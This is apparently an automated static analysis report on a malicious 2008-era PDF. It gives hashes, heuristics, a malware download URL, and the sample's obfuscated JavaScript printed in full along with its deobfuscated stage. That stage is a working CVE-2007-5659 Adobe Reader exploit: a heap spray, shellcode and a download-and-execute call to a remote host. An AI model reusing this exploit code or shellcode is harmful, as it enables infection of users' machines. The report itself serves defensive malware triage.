Malicious PDF — malware analysis report

Static analysis result for SHA-256 515f6eb87ef35bdc…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2013-02-18
MD5: 7e51b7f0e4bf6d2063e1af6795aea2db SHA-1: cd95006dac4e89a311bd41cded7f6149405b4549 SHA-256: 515f6eb87ef35bdc1b886644888b216a361229a1a210011c9b3cc1f6a55601aa
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream includes an eval() call, which is a strong indicator of obfuscation and dynamic code execution. This suggests the script is designed to download and execute a second-stage payload from a remote source. The obfuscation makes it difficult to determine the exact nature of the payload or its final destination without further dynamic analysis.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function NzPHlQBgLca(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function fsAHi911XA2jMV(BQywh3r9d){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(BQywh3r9d)"+";"+"}");eval("function baGysX(zCCxpvIGxg){var MNXG5uRaAWgTAF="+"0,ThAev=zCCxpvIGxg.l"+"en"+"gth,MZjU0qmGR4=10"+"2"+"4,ubltoyqd,dtqqsu,CYTR7='',XaC2NT=MNXG5uRaAWgTAF,Zhl3TfqRW=MNXG5uRaAWgTAF,QgNAWG66=MNXG5uRaAWgTAF,VZkkcvLpxjI=Ar"+"ra"+"y(63,6,19,20 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=1518&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x369 6342 bytes
SHA-256: 999d71d4fe64f30aeb2bc98cc3e27667e86907c73f339024f4421051688cdf7c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function NzPHlQBgLca(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function fsAHi911XA2jMV(BQywh3r9d){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(BQywh3r9d)"+";"+"}");eval("function baGysX(zCCxpvIGxg){var MNXG5uRaAWgTAF="+"0,ThAev=zCCxpvIGxg.l"+"en"+"gth,MZjU0qmGR4=10"+"2"+"4,ubltoyqd,dtqqsu,CYTR7='',XaC2NT=MNXG5uRaAWgTAF,Zhl3TfqRW=MNXG5uRaAWgTAF,QgNAWG66=MNXG5uRaAWgTAF,VZkkcvLpxjI=Ar"+"ra"+"y(63,6,19,20,17,7,59,37,0,3,0,0,0,0,0,0,14,49,31,54,55,56,61,9,1,24,21,57,29,52,53,30,62,38,25,4,50,5,8,41,13,60,34,0,0,0,0,15,0,22,16,42,26,10,44,32,27,23,2,40,18,51,46,45,11,48,28,33,47,58,35,36,39,43,12);f"+"o"+"r(dtqqsu=M"+"at"+"h.c"+"ei"+"l(ThAev/"+"MZjU0qmGR4)"+";dtqqsu>MNXG5uRaAWgTAF;dtqqsu-"+"-){fo"+"r(ubltoyqd=Ma"+"th.m"+"in(ThAev,MZjU0qmGR4);ubltoyqd>MNXG5uRaAWgTAF;ubltoyqd-"+"-,ThAev-"+"-){QgNAWG66|"+"=(VZkkcvLpxjI[zCCxpvIGxg.cha"+"rCod"+"eAt(XaC2NT+"+"+)-48])<"+"<Zhl3TfqRW;if(Zhl3TfqRW){CYTR7+"+"=fsAHi911XA2jMV"+"(80^QgNAWG66&"+"2"+"5"+"5);QgNAWG66>"+">="+"8;Zhl3TfqRW-"+"="+"2;}el"+"se{Zhl3TfqRW="+"6"+";}}"+"}return (CYTR7);}var C1BCTr=implode('',['qR','lz','Z','8','xXJr1_czmzKks8qN1rP3','mGq','UsVZS2eE7','D','dq','R2GP','z9G','KYv_','qJA@','Jr4','_vU','lU','DSjXk','z9OHw48YbTXY','Hx','VP','I1d8g2Oq','ojr','xg2','@Y39rEUb','1Hq','9','G','DE5_NEm','Xwg','v','OZA','QVPI1d8','g2OySb1Hq9GD','8DOoHi','8RS8_wrmdo8','i8RS8_w','r9r','o','H','i8R','S8','_wrvBv3','ZzvbZ','V','KEmXEH1BZEv','RkH8@0G','aOyHxVNblGZE9rH','w4','8YbTXy','HipqR2GPz9GKYv_qG9Ijk8GC8','TXKr','2G','8giOqoj','rQ','SvVqR25g4','vH','9b11Lf9r','oH5Ik8C','zgX9','Im8CzyHxGAVjr','7gqXm','gT59r2jqN1r7E2Xvz2zg39OT','J','iGwX1R','v','J','i','GwX1RvJiGwX1RvJ','i','GgR4U','l3iGvX','aRl3','iGQRCSWJiG','kHQSW','JiG','kH1I','s','J','iGJIAIvJ','i','GJ','V1','RvJ','iG','JVs','U43iGJg1I7Ji','G','aI4','U23iG','aIsU','a3','iG','kGARa3iG3','IHRJ3iGJ','I4U','a3iGQ4aUa3i','GJz','aSa','3iGW','R','sRwJiG','wGQUvJiGWR','sR','wJiGQJ4UxJ','i','GJIHIvJiGJI4U','l','3','i','GQ4aU','a3iGlw1IvJi','GQU1dx','JiGJSaSsJiG','g','L1IvJiGJI4IsJi','GJ','I','4Ua3iG4SsR','QJiGlwaUl','3iGxL1dxJiG','Q','JaI','sJiGg','LaUsJi','G','JI4Ia3iGJ','I4U','a3iG4SsRQ','JiGlwaUxJ','iG','2','SH','dxJ','iGs','H','aR','a3iGgLQI33iGJIHI33iG','JI4Ua','3','i','G4S','sRQJiGlwaU','vJiGg','H1dxJiGgR','sIsJ','iG','gL1','da3','i','GJI','AIl3','iGJI','4Ua3iG4SsR','QJiGlwQUa3iGZJHdxJiGgU4','dQJiGgLaRxJiGJIs','IWJ','iGJI4Ua','3','i','G','4','Ss','RQJiG4I','sUl3iG3rQRa3i','GWUs','I23iGQR','aI7','J','iGaraS4','3iGJg1IQJ','i','GJI4UJ3iGlS','aUa3','iGWUsR','Q','JiGQ4CSl3i','GJV4S','43i','GJ','3Hd7','JiG','Q4QS','QJ','i','GarQS43iGgLQ','SWJiG','JIs','RwJiGJI4Ua3','iGkLQSa','3iGa31UW','J','iGWRASgJiGxs','1IxJ','iGJI4Ua3iGQRaUa3iGazaS43i','GZU','s','RwJiG','ZRs','R23iGQRQSa3iG2I4S43iGsH1dxJ','iGJI4Ua3','i','GlI4Ua3iG4SsRwJi','Gk','JQU','l3iG','lIaU33iGlSs','RwJi','GgLQUxJi','GJIHdJ','3i','GJI','4Ua3','iG4S','4U23i','GZs','CSa3','iGlzaUa3iG2S','adsJiGZs1d4','3','iGJV4Sa3iGk','U4dxJiGJI4Ua3i','GWU4IgJiGQ4CSa3iGJza','S','43','iGJ3Hd7JiG','Q4QSQJiGa','rQS43iG4IHIxJiG','JI4Ua3iGkJ','aUa3','iGlraUkJiG4','S4','U23iG3zASl3iGl','zAIwJ','iG','sHQ','S23i','G2I4d43iGlzsS','a3','iG4S','sRwJiGkJ','Q','UvJiGl','IaU43','iGlSsR','wJiGgLQ','U','xJ','iG','JIAS23i','GJI4Ua3iG','JIHd7JiGWU4IgJ','iGQ','4CSa3','iGJra','S43iGJbHd7JiGQ4Q','SQJ','iGa','r','QS43i','GaIHIxJiGJ','I','4U','a','3iGkJaUa3iGQ4a','IgJiGaI4S4','3i','GJ3Hd7JiGQ4QSQ','JiGarQS43i','GJIH','I','xJiGJI4Ua3i','G43','4Ua','3iGlb','sS','wJiGgJ4U23i','Gg','J4U','23','iGgJ4U2','3iGgJ4U2','3iGgXQ','R23iG','l3aUl3','iGQ4QS23iGg4AI','7JiGlb4I','kJiGgR4','Ig','JiGQ4QS43iGQ41Iv','JiGJ','radZJiG','lVQRwJiGlwaUv','JiGWXsRwJiG','Q41','U','vJiGa','Sadl3iGJz4d','xJi','Gl','waI','23iG','W7QRwJiGJzASa3iG3z4I','23','iG4IQ','IQJi','GwGaSJ3iG','ZX4U23iG3zsSWJiGJ8aIWJi','G','a','I4RsJiGs4H','U','7J','iGJrad','l3iGZUQI','J3iGJz','4UZJiG4','I4I','33iGsJHIw','JiGsU1UwJiGWUsSsJiGl31','I43iGg4','QRwJiGl3QRwJ','i','GJ','zASl','3i','Gk7CIZJ','iGJzQR','wJiGQ4aSwJiGazQS','7JiGvGaU23iGJV','sRwJiGJzsRwJiGlSQI','43iGZ4sSZJiGJI4UxJiGsGHIxJiG','sHaI','sJi','G','l','S4IgJiG4zQ','S3','3iG4','8aSZJi','G','J','I4SsJiGx4Q','RkJ','iGxHCR','w','JiGZRAI4','3iGQUQ','Ia3','iGQGQ','RZJiG','v7CIsJiGZJ','A','I','Z','JiGQJs','Rv','Ji','G','QJQIa3iGx','HCRkJiGQXsIa3iG','QUQRa3iGZJsR','wJiGQsCR','gJ','iGvRARgJiGQ4QRWJiGvUCI','33i','GvU','CI7JiGZRCIkJiGx','H','CRv','J','iGv4sR23iGgHC','IwG','iOyHxG','AVjr','GkAz7Xg','Ue3Z1','Zr','HRqN1rgsjRg','H','1I','gH','CdqRlzZ8i','8TSs5GkbVagQ','@US9','roHiG','VrmzkYA8Dw','gBY3v_Dbj@qW5rZo1rQSv','VqGZ_Qs18E8ihq7','g1m3','C8akbGdVTUwHiBqsi8','T','Ss5Gkb','Va','gQ@US','mOgsTIk7DdqRlzZ8i8RS','8_w','r9roHiG','P','3m','V','mS9VNgxrN','Jldg','71I','NJ','ldg71I','T7','DdqUb1Hq9','GD8ihqJ','A@Jr4','_','vUlUDSjXkz9OHw48Y','bTXYH','xVPI1d','8g2OyHx','GA','V','jr','KkvzL','Ev1C','8g5kHihq','sxXL81X1z','8RIMA','@qN5','rgsjRgH1IgHaO07g1m3C8ak','bGdVT','Uwo1rCYvVqsxGAVjr3','zg','jQHa1FM1Iy4A8eI1','IRM9hK','kvzL','E','v1C8g5ko1U9kgRg74','_','6oiOqojrC3ARYkT','zmwv','1jf','8U9kgRg','7','4','_X8ihqU','b1Hq','9G','D8DOqJ','jjDz9eB','zqXGf1','ro8ipqR2GPz','9G','K','Yv_q','Lq','IWYv1v7sRMz8H2VQ1E','7','5ry8xGAVjrezQG6MAHqN1','rA8j','VPRl@NrlXZ','IbXZz','l@0','EvB','wYm8wVl@Pr','9OKo1re','zQG6MAHqN1re','zQG6','MAHPGlXgq2','zm39','O0A8U0','L9BTGiOyHxGA','V','j','rUzj1','Ig','8@NIv','5mw','95jV1roHx_Nrjr4V','Z','VAw','jOezQG6MAHP','X','9@AVl','Swg5I','K','AxjvR','T@LrgBmg2','zZSH','GE','UaOYWqIQf255EDz','ESvV4bjOZ7i','OyHi@C85OE','JqVIgHjE3vXOz2','@rVgIp','8a9qNa','hq','s1rCR5rEsiHvgH','1Vg2XCEAz','Kqs','8','ZobIX8i','h','oHiIqRxLqJqVIgHjE3vXOz2@rV','gIpVa9','qA1rZ75rfqjr','Uzj1Ig','8@NIv5mw9','5jV','CjsN8rfHiIK7','5','r','fqjrEJqVIgHjE','3vXOz2@rVgI','p','8a','9qNa','h','qL1rCR5rUz','j1Ig8@NIv5','mw95','jVC','jsN8rfH','iIK','H5pf','8','5OUzj1Ig8@NIv5mw95jV','CjgN8rfHDR','K75ry8xzgGgj','wI9V','DwmX788O','Ko','1rQSv','VqRHdZ','G4z','3zHGNMAGA8ihq','JZ_NzTzA8','l','XEG','i','L78CzgX2','L7','8CzgXvr','Ko','1','r','xg','2@Y3','9OagQI','lS9U','2blX','L','rlzPA2XPr9GE','85hq4','1RWJQIKHxUkGQSAbASw325x','S','9r6','N1ra','gQI','lS9U2blX','Lr','lzyH5GEwmV','PXm_Yq2zTz8G0VlX','qN1r2Y','9_YSvzPXm_','Yq2','X','mblUFS','2','@Yws_C','Y9OyzlGTkvdq','GxrYNmVDk','1ragQ','IlS','9U2blXLrlzowDdqNjro8DHv7T_dza1','Q4m8','SzsIdgiOyH']);");eval(baGysX(C1BCTr));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x369 2584 bytes
SHA-256: be628a456ac9069ed138c2c1b03cac962a6287dffe76509350c290cb89e26c0d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var fE7lzcciJR = new Array(); function EkEGm3qEgqdxc(QIQltg, rn68Ph) { while (QIQltg.length*2<rn68Ph){QIQltg += QIQltg;} QIQltg = QIQltg.substring(0,rn68Ph/2); return QIQltg; } function b0RZtfpgiguP() { var fM0dVS4HMk = 0x0c0c0c0c; var uXgcxOSgY = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u313D%u3135%u2638%u7073%u3D6C%u0034"); var YJc5SFZuJrG4 = 0x400000; var QbANYZqF8jUa = uXgcxOSgY.length * 2; var rn68Ph = YJc5SFZuJrG4 - (QbANYZqF8jUa+0x38); var QIQltg = unescape("%u9090%u9090"); QIQltg = EkEGm3qEgqdxc(QIQltg, rn68Ph); var ijbMnJfPN8 = (fM0dVS4HMk - 0x400000)/YJc5SFZuJrG4; for (var DSZ60Im=0;DSZ60Im<ijbMnJfPN8;DSZ60Im++) { fE7lzcciJR[DSZ60Im] = QIQltg + uXgcxOSgY; } } function W3yoJ3I6dSTC2J() { var Z3vkMW = app.viewerVersion.toString(); Z3vkMW = Z3vkMW.replace(/\D/g,""); var UsHHXhefNciLR2 = new Array(Z3vkMW.charAt(0),Z3vkMW.charAt(1),Z3vkMW.charAt(2)); if ((UsHHXhefNciLR2[0] == 8 && ((UsHHXhefNciLR2[1] == 1 && UsHHXhefNciLR2[2] < 2) || UsHHXhefNciLR2[1] < 1)) || (UsHHXhefNciLR2[0] == 7 && UsHHXhefNciLR2[1] < 1) || (UsHHXhefNciLR2[0] < 7)) { b0RZtfpgiguP(); var F82BaDCteMwa = unescape("%u0c0c%u0c0c"); while(F82BaDCteMwa.length < 44952) F82BaDCteMwa += F82BaDCteMwa; this.collabStore = Collab.collectEmailInfo({subj: "",msg: F82BaDCteMwa}); } } W3yoJ3I6dSTC2J();